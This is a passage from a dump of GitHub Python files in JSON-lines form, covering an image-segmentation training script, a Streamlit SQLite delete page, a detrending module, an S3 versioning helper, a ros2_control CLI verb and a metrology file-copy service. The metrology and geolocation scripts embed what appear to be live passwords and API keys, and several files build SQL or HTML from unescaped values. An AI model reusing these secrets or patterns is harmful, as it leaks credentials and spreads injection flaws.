4)\nlfu.get(1)\nlfu.get(3)\nlfu.get(4)\n","repo_name":"Protype8/PythonCompetitionCodes","sub_path":"atcoder/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42061868586","text":"import datetime\nimport os\nfrom keras.optimizers import Adadelta\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom datanail import *\nfrom res_unet import *\nfrom utils import *\n\n# hyper parameters\nmodel_name = \"res_unet_\"\ninput_shape = (512, 512, 1)\ndataset_folder = \"\"\nclasses = []\nbatch_size = 1\n\ndata_gen_args = dict(rotation_range=0.2,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range=0.05,\n zoom_range=0.05,\n horizontal_flip=True,\n fill_mode='nearest')\nmyGene = trainGenerator(batch_size,'data/train','image','label',data_gen_args,save_to_dir = 'data/train/aug')\n\nmodel_file = model_name + datetime.datetime.today().strftime(\"_%d_%m_%y_%H:%M:%S\") + \".h5\"\nmodel = build_res_unet(input_shape=input_shape)\nmodel.summary()#输出模型各层的参数状况\noptimizer = Adadelta()#梯度优化,自适应学习率调整\nmodel.compile(optimizer=optimizer, loss='mse', metrics=['accuracy'])\n\nmodel_checkpoint = ModelCheckpoint(os.path.join(\"models\", model_file), monitor='loss', save_best_only=True, verbose=True)\ntensorboard = TensorBoard()#计算图可视化\n#train_aug = ImageDataGenerator(vertical_flip=True, horizontal_flip=True)\n#train_gen = PASCALVOCIterator(directory=dataset_folder, target_file=\"train.txt\",\n #image_data_generator=train_aug, target_size=(input_shape[0], input_shape[1]),\n #batch_size=batch_size, classes=classes)\n\nmodel.fit_generator(myGene, steps_per_epoch=300,epochs=1,callbacks=[tensorboard, model_checkpoint])\ntestGene = testGenerator(\"data/test\")\nresults = model.predict_generator(testGene,6,verbose=1)\nsaveResult(\"data/test\",results)\n","repo_name":"Melissaliyuemei/resnet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16026404998","text":"import streamlit as st\r\nimport sqlite3\r\n\r\nst.title('Excluir cadastro')\r\n\r\n# Conectar ao banco de dados\r\nconn = sqlite3.connect('novo.db')\r\ncursor = conn.cursor()\r\n\r\n# Executar a consulta SQL para obter os dados da tabela 'entrada'\r\ncursor.execute(\"SELECT * FROM entrada\")\r\ndata = cursor.fetchall()\r\n\r\n# Obter os nomes das colunas\r\ncolumn_names = [description[0] for description in cursor.description]\r\n\r\n# Fechar a conexão com o banco de dados\r\nconn.close()\r\n\r\n# Criar uma tabela no Streamlit\r\ntable = \"\"\r\ntable += \"\"\r\nfor col_name in column_names:\r\n table += f\"\"\r\ntable += \"\"\r\n\r\n# Função para atualizar o status no banco de dados\r\ndef atualizar_status(id, novo_status):\r\n conn = sqlite3.connect('novo.db')\r\n cursor = conn.cursor()\r\n cursor.execute(\"UPDATE entrada SET Status=? 
WHERE ID=?\", (novo_status, id))\r\n conn.commit()\r\n conn.close()\r\n\r\n# Função para excluir uma linha do banco de dados\r\ndef excluir_cadastro(id):\r\n conn = sqlite3.connect('novo.db')\r\n cursor = conn.cursor()\r\n cursor.execute(\"DELETE FROM entrada WHERE ID=?\", (id,))\r\n conn.commit()\r\n conn.close()\r\n\r\n# Obter os valores únicos da coluna 'data' para o filtro\r\nunique_dates = list(set([row[column_names.index(\"data\")] for row in data]))\r\n\r\n# Criar um seletor de data para filtrar\r\nselected_date = st.date_input(\"Filtrar por data:\", value=None, min_value=None, max_value=None, key=None, help=None)\r\nif selected_date:\r\n filtered_data = [row for row in data if row[column_names.index(\"data\")] == selected_date.strftime(\"%Y-%m-%d\")]\r\nelse:\r\n filtered_data = data\r\n\r\n# Exibir os dados filtrados na tabela\r\nfor row in filtered_data:\r\n table += \"\"\r\n for value in row:\r\n table += f\"\"\r\n table += \"\"\r\ntable += \"
{col_name}
{value}
\"\r\n\r\n# Exibir a tabela no Streamlit\r\nst.write(table, unsafe_allow_html=True)\r\n\r\n# Excluir a linha selecionada\r\nselected_id = st.selectbox(\"Para excluir, selecione o ID:\", [str(row[0]) for row in filtered_data])\r\nif st.button('Excluir'):\r\n excluir_cadastro(selected_id)\r\n","repo_name":"lotenapedra/portaldeacesso","sub_path":"editar_excluir.py","file_name":"editar_excluir.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20951881082","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef main_detrend(detrend_degree: int, time: pd.Series, val: pd.DataFrame, label: list):\r\n \"\"\"\r\n This is the primary function for parsing the detrending of the data. The objective here is to\r\n take the inputs, and pass them to the appropriate type of detrending.\r\n :param detrend_degree: This is the degree of the polynomial that we want for detrending.\r\n :param time: The time series of the data we're looking at.\r\n :param val: The associated values for each time point of the data we're looking at.\r\n :param label: The name of all the signals in the data set.\r\n :return:\r\n detrend_data: pd.DataFrame containing the detrended data (values only!)\r\n trend: This is a Numpy Array containing the coefficients of the detrending, which we use for\r\n re-calculating approximations.\r\n std_list: Same as above, except as a pd.Series. Standard deviation is used as another part\r\n of the detrending, so we use it later for re-calculating the approximations.\r\n \"\"\"\r\n # We pass the function through our general polynomial fitting function. Technically, if the\r\n # detrend_degree is 0, there are faster ways of manipulating the data, but this is easier for\r\n # reference and formatting later.\r\n detrend_data, trend, std_list = poly_fit(time, val, label, detrend_degree)\r\n\r\n return detrend_data, trend, std_list\r\n\r\n\r\ndef constant_detrend(val: pd.DataFrame):\r\n \"\"\"\r\n Does a constant detrend of the data. This function is faster than a poly_fit with degree 0, but goes unused\r\n so that we can have a consistent output format. 
I'm keeping it here just in case.\r\n :param val: Input data from transient stability.\r\n :return:\r\n detrend_data: pd.DataFrame that contains the detrended data.\r\n mean_data: np.NdArray that contains the coefficients of the linear detrend function.\r\n std_list: dictionary that contains the standard deviation used for normalization.\r\n \"\"\"\r\n\r\n # Gets the means for all the signals.\r\n mean_data = val.mean()\r\n # Subtracts the mean from each of the corresponding signals.\r\n difference_data = val - mean_data\r\n # Gets the standard deviation for each signal.\r\n std_list = difference_data.std(ddof=0)\r\n # Gets the detrended data.\r\n detrend_data = difference_data / std_list\r\n\r\n return detrend_data, mean_data, std_list\r\n\r\n\r\ndef poly_fit(time_series: pd.Series, val: pd.DataFrame, labels: list, degree: int):\r\n \"\"\"\r\n This is a generic polynomial fitting function, along with detrending the data.\r\n :param time_series: The time series of the data we're looking at.\r\n :param val: The associated values for each time point of the data we're looking at.\r\n :param labels: The name of all the signals in the data set.\r\n :param degree: This is the degree of the polynomial that we want for detrending.\r\n :return:\r\n detrend_data: pd.DataFrame containing the detrended data (values only!)\r\n poly: This is a Numpy Array containing the coefficients of the detrending, which we use for\r\n re-calculating approximations.\r\n std_dict: Same as above, except as a pd.Series. Standard deviation is used as another part\r\n of the detrending, so we use it later for re-calculating the approximations.\r\n \"\"\"\r\n # Does a polynomial fit over the entire data set.\r\n poly = np.polynomial.polynomial.polyfit(time_series, val, degree)\r\n\r\n # Each column of poly_df refers to the coefficients of the equation c0 + c1*x + c2*x^2 + ... + cN * x^N\r\n poly_df = pd.DataFrame(poly, columns=labels)\r\n\r\n # To take advantage of itertuples and its speed, we transpose the DataFrame.\r\n poly_df = poly_df.T\r\n\r\n # This is where we'll store our standard deviations and detrended data.\r\n std_dict = {}\r\n detrend_dict = {}\r\n # Iterates through each row of the polynomial fit DataFrame.\r\n for row in poly_df.itertuples():\r\n # The index gets you the name of the signal.\r\n label = row.Index\r\n # The remaining information stored in the row are the coefficients of the polynomial fit.\r\n poly_func = np.array(list(row[1:]))\r\n poly_eval = np.polynomial.polynomial.polyval(time_series, poly_func)\r\n # Subtracts the linear fit from the original data, and renames the series for storage.\r\n difference = val[label].values - poly_eval\r\n difference = difference.rename(label)\r\n # Gets the standard deviation. 
We need this to rescale the data later.\r\n std_diff = difference.std(ddof=0)\r\n std_dict[label] = std_diff\r\n # Divides the data by the standard deviation for normalization.\r\n detrend = difference / std_diff\r\n # Stores the data in a new list.\r\n detrend_dict[label] = detrend\r\n\r\n # Converts the resulting dictionary into a new DataFrame.\r\n detrend_data = pd.DataFrame(detrend_dict)\r\n\r\n return detrend_data, poly_df, pd.Series(std_dict)\r\n","repo_name":"Weifarers/IMP","sub_path":"detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"18896919987","text":"import pytest\nfrom workos.events import Events\nfrom tests.utils.fixtures.mock_event import MockEvent\n\n\nclass TestEvents(object):\n @pytest.fixture(autouse=True)\n def setup(self, set_api_key, set_client_id):\n self.events = Events()\n\n @pytest.fixture\n def mock_events(self):\n events = [MockEvent(id=str(i)).to_dict() for i in range(100)]\n\n return {\n \"data\": events,\n \"list_metadata\": {\"after\": None},\n \"metadata\": {\n \"params\": {\n \"events\": None,\n \"limit\": None,\n \"after\": None,\n \"range_start\": None,\n \"range_end\": None,\n \"default_limit\": True,\n },\n \"method\": Events.list_events,\n },\n }\n\n def test_list_events(self, mock_events, mock_request_method):\n mock_request_method(\"get\", mock_events, 200)\n\n events = self.events.list_events()\n\n assert events == mock_events\n\n def test_list_events_returns_metadata(self, mock_events, mock_request_method):\n mock_request_method(\"get\", mock_events, 200)\n\n events = self.events.list_events(\n events=[\"dsync.user.created\"],\n )\n\n assert events[\"metadata\"][\"params\"][\"events\"] == [\"dsync.user.created\"]\n","repo_name":"workos/workos-python","sub_path":"tests/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"21055072087","text":"from tkinter import *\r\n\r\nroot=Tk()\r\n\r\nglobal time\r\ntime=60\r\n\r\ndef countdown():\r\n global time \r\n\r\n if time>0:\r\n time_label.config(text=\"Time Left: \"+str(time))\r\n time-=1\r\n time_label.after(1000, countdown)\r\n \r\n\r\ntime_label=Label(root, text=\"Time Left: \", font=('helectiva', 20, 'bold'))\r\ntime_label.pack()\r\n\r\nstart_button=Button(root, text=\"Start\", command=countdown)\r\nstart_button.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"GanneGowtham/Mini-Projects-using-Tkinter-module","sub_path":"Projects/60 seconds timer.py","file_name":"60 seconds timer.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32555075032","text":"import requests\n#this method gets the current location of the user\ndef get_current_location():\n payload = {'key': 'AC734C7771F717B36767BB165121F669', 'ip': requests.get('https://api.ipify.org').text, 'format': 'json'}\n api_result = requests.get('https://api.ip2location.io/', params=payload)\n json_result = api_result.json()\n city = json_result['city_name']\n latitude = json_result['latitude']\n longitude = json_result['longitude']\n return latitude, longitude, 
city\n\nprint(get_current_location())","repo_name":"mysticfiretail/CS411","sub_path":"get_current_loc.py","file_name":"get_current_loc.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17457944992","text":"import pandas as pd\nimport pypyodbc as pyodbc\nimport shutil\nimport os\nimport subprocess\nimport datetime\nimport sys, traceback\nimport base64\n################################################################################\npython_file_path = os.path.dirname(os.path.realpath(__file__))\n################################################################################\n\ndef lambda_(ctx):\n global logger\n global date_now\n global date_string\n global informatics_db_server\n global metrology_root_dir\n result = {'isok':-1, 'error_message':'', 'uuid':0}\n date_now = datetime.datetime.now()\n date_string = date_now.strftime(\"%Y-%m-%d %H:%M:%S\")\n df_config = pd.read_excel(python_file_path+r'\\metrology_config.xlsx', sheet_name='config')\n informatics_db_server = df_config['informatics_db_server'].iloc[0]\n metrology_root_dir = df_config['metrology_root_dir'].iloc[0]\n #\n try:\n #if True:\n ### Get data for Metrology tools; read from Excel file ###\n #df_equip = pd.read_sql_query(sql_get_equip(),db_imdb)\n df_equip = pd.read_excel(python_file_path+r'\\metrology_config.xlsx', sheet_name='push')\n df_equip.columns = [x.lower() for x in df_equip.columns]\n df_equip = df_equip[df_equip['active'] == 1]\n df_equip['equipmentid'] = df_equip['equipmentid'].astype(int, errors='ignore')\n df_equip.set_index('equipmentid',drop=False,inplace=True)\n equip_id_list = df_equip['equipmentid'].tolist()\n equip_id_string = ','.join(str(e) for e in equip_id_list)\n #\n df_email = pd.DataFrame(columns=('fileid','source','destination', \\\n 'created','lastmodified','copy_result','comment'))\n #print(equip_id_list)\n #print(equip_id_string)\n #print(df_equip)\n #return result\n ### Database connection ###\n db_config = DBConfig()\n db_imdb = pyodbc.connect(db_config['IMDB_CONN_STRING'])\n cur_imdb = db_imdb.cursor()\n # get set of files to be copied\n #### Set start date ###\n #start_date = '2018-05-28'\n window = 7 # days\n start_date = (date_now - datetime.timedelta(days=window)).strftime(\"%Y-%m-%d\")\n df_files = pd.read_sql_query(sql_get_files(start_date,equip_id_string),db_imdb)\n #print(df_files)\n #return result\n # loop through file list\n ### set up network connection ###\n if os.popen('net use').read().find(metrology_root_dir) < 0:\n net_use = 'NET USE \"' + metrology_root_dir + r'\" $3rv1c3 /user:intermolecular\\s_cf'\n subprocess.call(net_use, shell=True)\n ### Loop through file list ###\n for index, row in df_files.iterrows():\n # DataFileLog row data\n fileid = row['fileid']\n equipmentid = row['equipmentid']\n filename = row['filename']\n datadir = row['datadir']\n filefullpath = row['filefullpath']\n created = row['created']\n lastmodified = row['lastmodified']\n lastlogged = row['lastlogged']\n previous_copy_result = row['result']\n equipmentname = df_equip.at[equipmentid, 'equipmentname']\n metrology_data_dir = df_equip.at[equipmentid, 'metrology_data_dir']\n suffix = df_equip.at[equipmentid, 'suffix']\n ### Check that source file exists ###\n ### If not, make an entry in the db and skip to the next record ###\n #print(filefullpath)\n if not os.path.exists(filefullpath):\n if previous_copy_result == None:\n copy_result = -1\n # Don't try to copy again\n comment = 'Source file not 
found'\n destination = ''\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n continue\n ### metrology CDP directory\n try:\n cdp_number = int(filename[0:3])\n except:\n cdp_number = 0\n if cdp_number <= 0:\n '''\n ### Can't determine CDP\n ### Don't copy but make an entry in db and skip to next record\n if previous_copy_result == None:\n copy_result = -1\n ### Don't try to copy again\n comment = 'Bad file name format'\n destination = ''\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n continue\n '''\n metrology_cdp_dir = 'NoCDP'\n elif cdp_number == 1:\n metrology_cdp_dir = 'Intermolecular'\n elif cdp_number <= 9:\n metrology_cdp_dir = 'CDP00' + str(cdp_number)\n elif cdp_number <= 99:\n metrology_cdp_dir = 'CDP0' + str(cdp_number)\n else:\n metrology_cdp_dir = 'CDP' + str(cdp_number)\n met_dir = metrology_root_dir + '\\\\' + metrology_cdp_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # metrology data directory\n # Special case for XRD/XRR\n if metrology_data_dir == 'XRD,XRR':\n if filename.find('XRR') >= 0 or datadir.find('XRR') >= 0:\n metrology_data_dir = 'XRR'\n else:\n metrology_data_dir = 'XRD'\n # Special case for SEM/EDS\n if metrology_data_dir == 'SEM,EDS':\n if datadir.find('EDS_Data') >= 0:\n metrology_data_dir = 'EDS'\n else:\n metrology_data_dir = 'SEM'\n met_dir = met_dir + '\\\\' + metrology_data_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # sub directory with year-month\n met_month_dir = str(created)[0:7]\n met_dir = met_dir + '\\\\' + met_month_dir\n if os.path.isdir(met_dir) == False:\n os.mkdir(met_dir)\n # metrology file name\n n = filename.rindex('.'); s1 = filename[:n]; s2 = filename[n:]\n met_filename = s1 + '_' + suffix + s2\n # destination full path and file name\n destination = met_dir + '\\\\' + met_filename\n ### copy file ###\n copy_return = shutil.copy2(filefullpath, destination)\n # For Ellipsometer, every .txt file is associated with a .SE file\n # which is not in the DataFileLog table; copy this as well\n if metrology_data_dir == 'ELLIPSOMETRY' and filefullpath.endswith('.txt'):\n filefullpath2 = filefullpath.replace('.txt','.SE')\n destination2 = destination.replace('.txt','.SE')\n if os.path.exists(filefullpath2):\n copy_return2 = shutil.copy2(filefullpath2, destination2)\n #################\n # check if copy succeeded\n if os.path.exists(destination):\n copy_result = 1\n # copy successful\n comment = ''\n else:\n copy_result = 0\n # Attempted to copy but failed\n # Will attempt to copy again next time\n comment = 'ERROR: File not detected at destination'\n # Make an entry that will be sent in email at the end\n df_email = df_email.append( { 'fileid':fileid,\n 'source':filefullpath, 'destination':destination,\n 'created':created, 'lastmodified':lastmodified,\n 'copy_result':copy_result, 'comment':comment }, ignore_index=True)\n # write to DataFileMetrology table\n if previous_copy_result == None:\n # New file, not previously copied\n sql = sql_metrology_insert(fileid, destination, created, \n lastmodified, copy_result, comment)\n else:\n if copy_result == 1 and previous_copy_result == 1:\n comment = 'New version of previously copied file'\n sql = sql_metrology_update(fileid, destination, created, \n lastmodified, copy_result, comment)\n db_result = cur_imdb.execute(sql)\n cur_imdb.commit()\n # close database 
connection\n db_imdb.close()\n # send email if errors have been generated\n if df_email.shape[0] > 0:\n with pd.option_context('display.max_colwidth', -1):\n output_html = df_email.to_html()\n send_metrology_email(output_html)\n # close network connection\n # on second thoughts, let's just leave it open as we're running so frequently\n #if prev_met_root_dir != None:\n # net_use = 'NET USE \"' + prev_met_root_dir + r'\" /DELETE'\n # subprocess.call(net_use, shell=True)\n # finished\n result['isok'] = 1\n return result\n except Exception as ex:\n logger.error('****** Exception in metrology_push.py ******')\n logger.error(date_string)\n logger.error(\"[\" + __name__ + \"]:\" + str(ex), exc_info=True)\n logger.error('************************************')\n result['error_message'] = 'Exception occurred in metrology_push.py'\n result['Exception'] = str(ex)\n # https://docs.python.org/3/library/traceback.html\n exc_type, exc_value, exc_traceback = sys.exc_info()\n result['exc_type'] = repr(exc_type)\n result['exc_value'] = repr(exc_value)\n tb = traceback.format_tb(exc_traceback, limit=None)\n n = len(tb); s1 = tb[n-1]; s2 = s1.strip().split('\\n'); i = 0\n for s in s2:\n i += 1; result['exc_traceback'+str(i)] = s.strip()\n return result\n\n\n\ndef DBConfig():\n IMDB_SERVER = informatics_db_server\n IMDB_DB = 'IMDB'\n IMDB_USER = 'sa'\n if informatics_db_server == 'dev-db-01':\n IMDB_PWD = base64.b64decode(b'aW50ZXJtb2xlY3VsYXIx').decode('utf-8')\n else:\n IMDB_PWD = base64.b64decode(b'U3Rhclcwcno=').decode('utf-8')\n IMDB_CONN_STRING = 'Driver={SQL Server};Server=%s;Database=%s;UID=%s;PWD=%s;' %(IMDB_SERVER, IMDB_DB, IMDB_USER, IMDB_PWD)\n return { 'IMDB_CONN_STRING' : IMDB_CONN_STRING }\n'''\ndef sql_get_equip():\n return (\"SELECT e.EquipmentID, e.EquipmentName, et.EquipmentType \"\n \"FROM Equipment e \"\n \"JOIN EquipmentType et on e.EquipmentTypeID = et.EquipmentTypeID \"\n \"WHERE e.EquipmentID in (\" + equip_id_string + \") \"\n \"ORDER BY e.EquipmentName\" )\n'''\ndef sql_get_files(date_string, equip_id_string):\n return (\"SELECT dfl.FileID,dfl.Created,dfl.LastModified,dfl.LastLogged,\"\n \"dfl.EquipmentID,dfl.DataDir,dfl.FileName,dfl.FileFullPath,dfm.Result \"\n \"FROM DataFileLog dfl \"\n \"LEFT JOIN DataFileMetrology dfm ON dfl.FileID = dfm.FileID \"\n \"WHERE dfl.EquipmentID in (\" + equip_id_string + \") \"\n \"AND dfl.LastModified >= '\" + date_string + \"' \"\n \"AND ( dfm.FileID IS NULL \" # new file not copied\n \"OR dfm.Result = 0 \" # previous copy attempt failed\n \"OR DATEDIFF(second, dfm.LastModified, dfl.LastModified) > 1.0 )\" ) \n # newer version of previously copied file\n\n# As usual, dates are problematic. 
For a good overview of dates in Python see:\n# https://stackoverflow.com/questions/13703720/converting-between-datetime-timestamp-and-datetime64/13753918#13753918\n\ndef sql_metrology_insert(fileid, destination, created, lastmodified, result, comment):\n return (\"INSERT INTO DataFileMetrology \"\n \"(FileID,Destination,Created,LastModified,DateCopied,Result,Comment) \"\n \"VALUES (\" + str(fileid) + \",'\"\n + destination + \"','\"\n + str(created)[0:23] + \"','\"\n + str(lastmodified)[0:23] + \"',\"\n + \"SYSDATETIME(),\"\n + str(result) + \",'\"\n + comment + \"')\" )\n\ndef sql_metrology_update(fileid, destination, created, lastmodified, result, comment):\n return (\"UPDATE DataFileMetrology \"\n \"SET Destination = '\" + destination + \"', \"\n \"Created = '\" + str(created)[0:23] + \"', \"\n \"LastModified = '\" + str(lastmodified)[0:23] + \"', \"\n \"DateCopied = SYSDATETIME(), \"\n \"Result = \" + str(result) + \", \"\n \"Comment = '\" + comment + \"' \"\n \"WHERE FileID = \" + str(fileid) )\n\n\ndef send_metrology_email(message):\n import smtplib\n from email.mime.text import MIMEText\n from email.mime.multipart import MIMEMultipart\n # https://en.wikibooks.org/wiki/Python_Programming/Email\n server = smtplib.SMTP('mail.intermolecular.com', 25)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(\"intermolecular\\s_cf\", \"$3rv1c3\")\n #\n from_addr = 'Python Metrology '\n to_addrs = 'George.Li@intermolecular.com,malcolm.mcgregor@intermolecular.com'\n #to_addrs = 'malcolm.mcgregor@intermolecular.com,George.Li@intermolecular.com'\n #to_addrs = 'pipeline.pilot@intermolecular.com, malcolm.mcgregor@intermolecular.com'\n #cc_addrs = 'malcolm.mcgregor@intermolecular.com'\n #\n msg = MIMEMultipart()\n msg['From'] = from_addr\n msg['To'] = to_addrs\n #msg['Cc'] = cc_addrs\n msg['Subject'] = 'Message from Python Metrology Service'\n #\n body = 'This is an automated message from Informatics; '\n body = body + 'please do not repond to this message; '\n body = body + 'instead contact a member of the informatics team in the '\n body = body + 'recipents above with any question or issues.
'\n body = body + 'There were some error messages generated when attempting '\n body = body + 'to copy from the Informatics server to the Metrology server; '\n body = body + 'see below.
'\n body = body + message\n #\n msg.attach(MIMEText(body, 'html'))\n text = msg.as_string()\n #s = server.sendmail(from_addr, to_addrs, text)\n server.send_message(msg)\n\n\n\n'''\nNotes:\nThe code only reads from 1 database table in IMDB:\n- the existing DataFileLog table.\nIt writes to only 1 table:\n- the newly created DataFileMetrology table, that only this app uses.\n\nScript for creating DataFileMetrology table:\n\nCREATE TABLE DataFileMetrology (\nFileID int NOT NULL PRIMARY KEY,\nDestination varchar(500),\nCreated datetime,\nLastModified datetime,\nDateCopied datetime,\nResult int,\nComment varchar (255)\n);\n\nDescription of database table fields:\nEach row is a file that corresponds to the DataFileLog table.\n FileID : from DataFileLog table\n Destination : full file name and path to metrology folder\n Created : from DataFileLog table\n LastModified : from DataFileLog table\n - used to determine if a new file version is available\n DateCopied : timestamp of entry\n Result : \n 1 = File successfully copied and detected at destination\n 0 = Copy attempt failed; file not detected at destination; \n will attempt to copy again next time\n -1 = Copy not attempted for known reason, eg. wrong file name format; \n will NOT attempt to copy again\n Comment : additional information such as error messages\n\n'''\n\n\n\nif __name__ == '__main__':\n import sys, re\n import logging\n logger = logging.getLogger(__name__)\n logging.basicConfig(filename=python_file_path+r'\\log\\metrology_push.log',level=logging.DEBUG)\n\n ctx= {}\n ctx['logger'] = logger\n ctx['uuid'] = 0\n ctx['args'] = {}\n \n result = lambda_(ctx)\n #print(result)\n","repo_name":"Claire56/metrology-IMI","sub_path":"metrology_push.py","file_name":"metrology_push.py","file_ext":"py","file_size_in_byte":15756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34764242821","text":"from controller_manager import switch_controllers\n\nfrom ros2cli.node.direct import add_arguments\nfrom ros2cli.node.strategy import NodeStrategy\nfrom ros2cli.verb import VerbExtension\n\nfrom ros2controlcli.api import add_controller_mgr_parsers, LoadedControllerNameCompleter\n\n\nclass SwitchControllersVerb(VerbExtension):\n \"\"\"Switch controllers in a controller manager.\"\"\"\n\n def add_arguments(self, parser, cli_name):\n add_arguments(parser)\n arg = parser.add_argument(\n \"--deactivate\",\n nargs=\"*\",\n default=[],\n help=\"Name of the controllers to be deactivated\",\n )\n arg.completer = LoadedControllerNameCompleter([\"active\"])\n arg = parser.add_argument(\n \"--activate\",\n nargs=\"*\",\n default=[],\n help=\"Name of the controllers to be activated\",\n )\n arg.completer = LoadedControllerNameCompleter([\"inactive\"])\n parser.add_argument(\"--strict\", action=\"store_true\", help=\"Strict switch\")\n parser.add_argument(\"--activate-asap\", action=\"store_true\", help=\"Start asap controllers\")\n parser.add_argument(\n \"--switch-timeout\",\n default=5.0,\n required=False,\n help=\"Timeout for switching controllers\",\n )\n arg.completer = LoadedControllerNameCompleter([\"inactive\"])\n add_controller_mgr_parsers(parser)\n\n def main(self, *, args):\n with NodeStrategy(args) as node:\n response = switch_controllers(\n node,\n args.controller_manager,\n args.deactivate,\n args.activate,\n args.strict,\n args.activate_asap,\n args.switch_timeout,\n )\n if not response.ok:\n return \"Error switching controllers, check controller_manager logs\"\n\n print(\"Successfully switched 
controllers\")\n return 0\n","repo_name":"ros-controls/ros2_control","sub_path":"ros2controlcli/ros2controlcli/verb/switch_controllers.py","file_name":"switch_controllers.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"40"} +{"seq_id":"7678382583","text":"import datetime, boto3, os, logging\nfrom utils.env import Env\nfrom botocore.exceptions import ClientError\n\n\nenv = Env()\n\n\nclass S3Client:\n def __init__(self) -> None:\n self.client = boto3.client(\n \"s3\",\n endpoint_url=env.get_value(\"S3_URL\"),\n aws_access_key_id=env.get_value(\"S3_ACCESS_KEY\"),\n aws_secret_access_key=env.get_value(\"S3_SECRET_KEY\"),\n config=boto3.session.Config(signature_version=\"s3v4\"),\n region_name=\"us-east-1\",\n )\n self.bucket_name = env.get_value(\"S3_BUCKET_NAME\")\n self.enable_versioning()\n\n def enable_versioning(self):\n self.client.put_bucket_versioning(\n Bucket=self.bucket_name, VersioningConfiguration={\"Status\": \"Enabled\"}\n )\n\n\nclass S3Utils(S3Client):\n def __init__(self) -> None:\n super().__init__()\n\n def get_object_version_and_last_modified(self, object_name: str) -> tuple[str, str]:\n try:\n response = self.client.list_object_versions(\n Bucket=self.bucket_name, Prefix=object_name\n )\n version_id = response[\"Versions\"][0][\"VersionId\"]\n last_modified = response[\"Versions\"][0][\"LastModified\"]\n return version_id, last_modified.replace(microsecond=0)\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def get_object_all_version_and_last_modified(self, prefix: str) -> dict[str:str]:\n mapping = {}\n response = self.client.list_object_versions(\n Bucket=self.bucket_name, Prefix=prefix\n )\n for obj_version in response.get(\"Versions\", []):\n mapping[\n obj_version[\"LastModified\"].replace(microsecond=0).isoformat()\n ] = obj_version[\"VersionId\"]\n return mapping\n\n def upload_file(\n self, file_name: str, object_name: str = None, path_name: str = None\n ) -> tuple[str, datetime.datetime]:\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n if path_name is not None:\n if path_name.endswith(\"/\") is False:\n path_name = path_name + \"/\"\n object_name = path_name + object_name\n\n try:\n with open(file_name, \"rb\") as data:\n response = self.client.put_object(\n Bucket=self.bucket_name, Key=object_name, Body=data\n )\n version_id = response.get(\"VersionId\", None)\n\n object_head = self.client.head_object(\n Bucket=self.bucket_name, Key=object_name, VersionId=version_id\n )\n last_modified = object_head[\"LastModified\"].replace(microsecond=0)\n\n return version_id, last_modified\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def upload_files_and_remove(\n self, file_name: str, object_name: str = None, path_name: str = None\n ):\n file_name_and_version_id = {}\n file_name_and_last_modified = {}\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n if path_name is not None:\n if path_name.endswith(\"/\") is False:\n path_name = path_name + \"/\"\n object_name = path_name + object_name\n\n try:\n with open(file_name, \"rb\") as data:\n response = self.client.put_object(\n Bucket=self.bucket_name, Key=object_name, Body=data\n )\n version_id = response.get(\"VersionId\", None)\n\n object_head = self.client.head_object(\n Bucket=self.bucket_name, Key=object_name, VersionId=version_id\n )\n last_modified = object_head[\"LastModified\"].replace(microsecond=0)\n\n 
file_name_and_version_id[os.path.basename(file_name)] = version_id\n file_name_and_last_modified[file_name] = last_modified\n\n return file_name_and_version_id, file_name_and_last_modified\n except ClientError as e:\n logging.error(e)\n return None, None\n\n def delete_file(self, object_name: str) -> None:\n try:\n self.client.delete_object(\n Bucket=self.bucket_name,\n Key=object_name,\n )\n except ClientError as e:\n logging.error(e)\n\n\nif __name__ == \"__main__\":\n s3_utils = S3Utils()\n\n # file_path = r\"D:\\Downloads\\Twitter.mp4\"\n # version_id, last_modified = s3_utils.upload_file(file_path, path_name=\"videos\")\n # print(version_id, last_modified)\n # s3_utils.client.delete_object(\n # Bucket=s3_utils.bucket_name,\n # Key=\"videos/Twitter.mp4\",\n # )\n dict_last_ver = s3_utils.get_object_all_version_and_last_modified(\"videos/\")\n print(dict_last_ver)\n key_list = list(dict_last_ver.keys())\n print(key_list[0])\n print(type(key_list[0]))\n print(\"*\" * 50)\n (\n version_id,\n last_modified,\n ) = s3_utils.get_object_version_and_last_modified(\"videos\")\n print(version_id, last_modified)\n print(type(version_id))\n 